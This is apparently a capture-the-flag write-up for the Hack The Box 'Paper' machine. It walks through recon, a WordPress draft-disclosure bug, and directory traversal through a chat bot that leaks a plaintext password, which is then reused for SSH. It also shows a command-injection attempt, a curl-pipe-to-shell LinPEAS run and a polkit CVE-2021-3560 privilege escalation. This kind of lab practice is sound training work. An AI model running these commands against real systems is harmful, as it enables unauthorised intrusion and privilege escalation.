by brydr
Paper is a fairly straightforward, easy box created by @secnigma. In this writeup, I will show you how to crack it and gain root privileges.
- OS: Linux
- Difficulty: Easy
Reconnaissance
Rustscan
First, we will be checking for open ports. I will be using rustscan here (because it's fast, and it's basically the Rust implementation of nmap), but you are free to choose whatever port scanner you like.
Just put the IP of your HTB instance on the designated placeholders. In my case, it's 10.10.11.143.
rustscan --range 0-65535 -a <ip_of_your_htb_instance>
We found that ports 22, 80, and 443 are open.
Let's check them out on nmap:
Nmap
nmap -A -p 22,80,443 <ip_of_your_htb_instance> --script vuln -T4 -vvv
SSH
HTTP
HTTPS
Nikto
The results were not satisfactory. Let's try another tool. Maybe nikto will find something more interesting.
nikto -host <ip_of_your_htb_instance>
Take a look at the header 'x-backend-server'.
Maybe we can use that as a hostname for the IP of our target. So, open your favorite text editor and edit your hosts file by adding:
<ip_of_your_htb_instance> office.paper
Nmap
Let's try scanning again, but now using office.paper instead of the target's IP.
nmap -A -p 22,80,443 office.paper --script vuln -T4 -vvv
Running the command above would give us a different result on port 80 (HTTP):
Our Nmap scan also gave us a list of the users found. Let's take note of that.
WPScan
So the website is using Wordpress. Having said that, we are going to use WPScan. But before that, make sure that you have already acquired your API token before using WPScan or you will never be able to utilize the scanner. You can get your own API token by signing up on their website.
On default Kali installations, wpscan is normally included, but just in case you do not have one installed on your VM, just enter sudo apt update && sudo apt install wpscan -y on your terminal.
Once you have acquired your API token, go to your terminal and type this:
export WPSCAN_TOKEN='<your_wpscan_api_token>'
After that, run wpscan on your terminal:
wpscan --url office.paper --api-token $WPSCAN_TOKEN
While the scan is running, let's explore the website a little bit.
In one of the posts, there is an interesting comment made by a user named Nick. Take note of that.
Initial Foothold
Let's return to our wpscan and check what we got:
As we can see, wpscan detected a lot of vulnerabilities. We are not an authenticated user, so we have to look for ways to enter the website and gain foothold.
Among the results, there is an interesting finding regarding a bug that allows an unauthenticated user to view draft posts. Remember the comment made by Nick that we saw earlier about the secret content in the drafts? Maybe we can use that to gain initial foothold.
In one of the links included in the vulnerability scan result, Sebastian Neef provides an excellent proof of concept of the said bug.
According to the blog, adding some certain query parameters to the base url will show the hidden content. Let's check it out using these query params:
http://office.paper/?static=1&orderBy=asc&m=YYYYMMDD
We are able to view the supposedly hidden draft, and there is a seemingly interesting private link included. Going to the link right away will lead us to nowhere. We need to add it first to our hosts file, just like what we did earlier.
Upon reaching the sign up page for Rocket Chat, we will try to sign up in their private chat system.
A successful registration leads us to the "general", the main channel in the chat system. Here we can see the conversations of different users, including their developer, Dwight.
Dwight apparently had created a chat bot named Recyclops inside the chat system. The bot requires some commands to which it responds to. Let's take a deeper look on what this bot can do.
These are some of the commands the bot is using:
-
Show the help menu:
recyclops help
-
List files in a directory:
recyclops list <directory_name>
-
Get the file and print its contents:
recyclops file <file_location>
There are some limitations to our user account in the chat system. We cannot reply in the "general" channel. The bot's help menu says the file and list commands are only limited to the "sales" folder. This means we're not supposed to have access to the other files within the server. Or so we thought.
So we have a command that accepts a path. Maybe we can try a directory traversal attack. But how can we do that if we can't even reply in the channel? Let's try sending direct message to some users.
Why don't we try sending a direct message to Recyclops itself, right?
Sending the command recyclops list . resulted to this:
Notice the dot on the previous file command. Doing some directory traversal using recyclops list ./../ would result to this:
Remember the OS that was detected on our nmap and nikto scan? It was CentOS right? Well, the result above looks like a home directory in Linux. The user.txt flag is actually already there. Let's try printing its value.
recyclops file ./../user.txt
We got an "Access denied" response. That's because we do not own the file.
How about putting some other OS commands?
recyclops list ./../ && cat user.txt
Denied again. Hmmmmmmmm. Maybe we need to enumerate some more. Using the same command that we used to view the /home directory, let's check the other files and directories.
recyclops list ./../
The folder named hubot seems interesting. We should take a look inside it.
recyclops list ./../hubot
From here, we can actually check the package.json if there are exisiting vulnerabilities in this Node.js app. But there is a juicier file that is present in this directory. Let's take a look at the .env file.
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
See the values for ROCKETCHAT_USER and ROCKETCHAT_PASSWORD? These are the credentials for Recyclops, we should try logging in using those. Let's log out and use the bot's credentials.
Ooops. We kinda hit a wall there. Hmmmmmmmmmmmmm. Let's think of other ways to pwn this server. Hmmmmmmmmmmmmm.........
Maybe we could try some credential stuffing/password spraying?
Remember the owner of the files that we saw when we did our directory traversal? That was Dwight, right? So let's try using his username and the password that we found on the .env file of hubot. Let's SSH into the server:
ssh dwight@10.10.11.143
Enter the password upon prompt.
It worked!
From here, we could simply print the user.txt flag and submit it. I'll leave that to you as an exercise.
Privilege Escalation
Now, we need to get the flag for root. For that, we need to do some privilege escalation.
My go-to tool for Linux privilege escalation is LinPEAS. LinPEAS provides suggestions on how you could escalate your privileges to root.
Let's check if we have cURL installed on the target server first, otherwise we will have to manually download the LinPEAS script there, set it as an executable (chmod +x) and run it.
which curl
Good. cURL is installed in the server. Now, what we need to do is just copy and paste the command as described in the Github repo.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
If the command above doesn't work for you, then we will have to download LinPEAS on our attack machine first, then transfer it using Python's HTTP Server.
Go to the releases page of LinPEAS and download linpeas.sh. After that, we need to setup an HTTP Server using Python. Please refer to the following commands below for the different ways to set it up:
Python 2
python -m SimpleHTTPServer <port_number>
Python 3
python3 -m http.server <port_number>
Make sure that the LinPEAS script is in the directory where you have set your HTTP Server up.
Since I have Python 3 installed in my Kali, I will be using this command python3 -m http.server 7000, with 7000 as my port.
After that, check your IP address on your attack machine using ip a. Look for the tun0 interface. (Most of the time it is named tun0. If you have other connections on your VPN, then yours might be different). Copy the IP address that was indicated in your interface, excluding the subnet (e.g. /23).
Go back to SSH session that we logged in to earlier. Navigate to the /tmp folder using cd. Type the following command:
curl http://<your_attack_machine_ip_address>:<port_number_on_your_http_server>/linpeas.sh --output linpeas.sh
Use chmod +x ./linpeas.sh so that we can run the script.
Let's run LinPEAS!
./linpeas.sh
This will take a while.
If we take a look at the description, there are different colors which indicates the chances of getting a privilege escalation. What we are interested in is the one with the RED/YELLOW color. Let's take a look at the result:
It says that the server is vulnerable to CVE-2021-3560. This vulnerability exploits the flaw in PolKit (policy kit) which allows an attacker to create a new superadmin. Let's look for exploits that are in the wild.
@secnigma has actually written a PoC (proof-of-concept) for this. Let's copy the contents, and paste it on the server using vim.
If you do not know how to use vim, try learning it, I'll leave it to you as an exercise.
vim poc.sh
Tip: In the poc.sh script, you can change the username and password of the account that will be created when we you run the script. By default, the username is secnigma and the password is secnigmaftw.
Exit vim, and change the type of poc.sh to executable. After that, run the script using ./poc.sh.
I've set my username as brydr and the password as strongPasswordWow. If the PoC execution was successful, it would look like this:
From there, you can just change the user to the one you have created using the Polkit exploit PoC, then run sudo bash.
I'll leave it to you on how to get the root flag, which is stored in root.txt.
Thanks for reading my writeup. Happy hacking!
Top comments (0)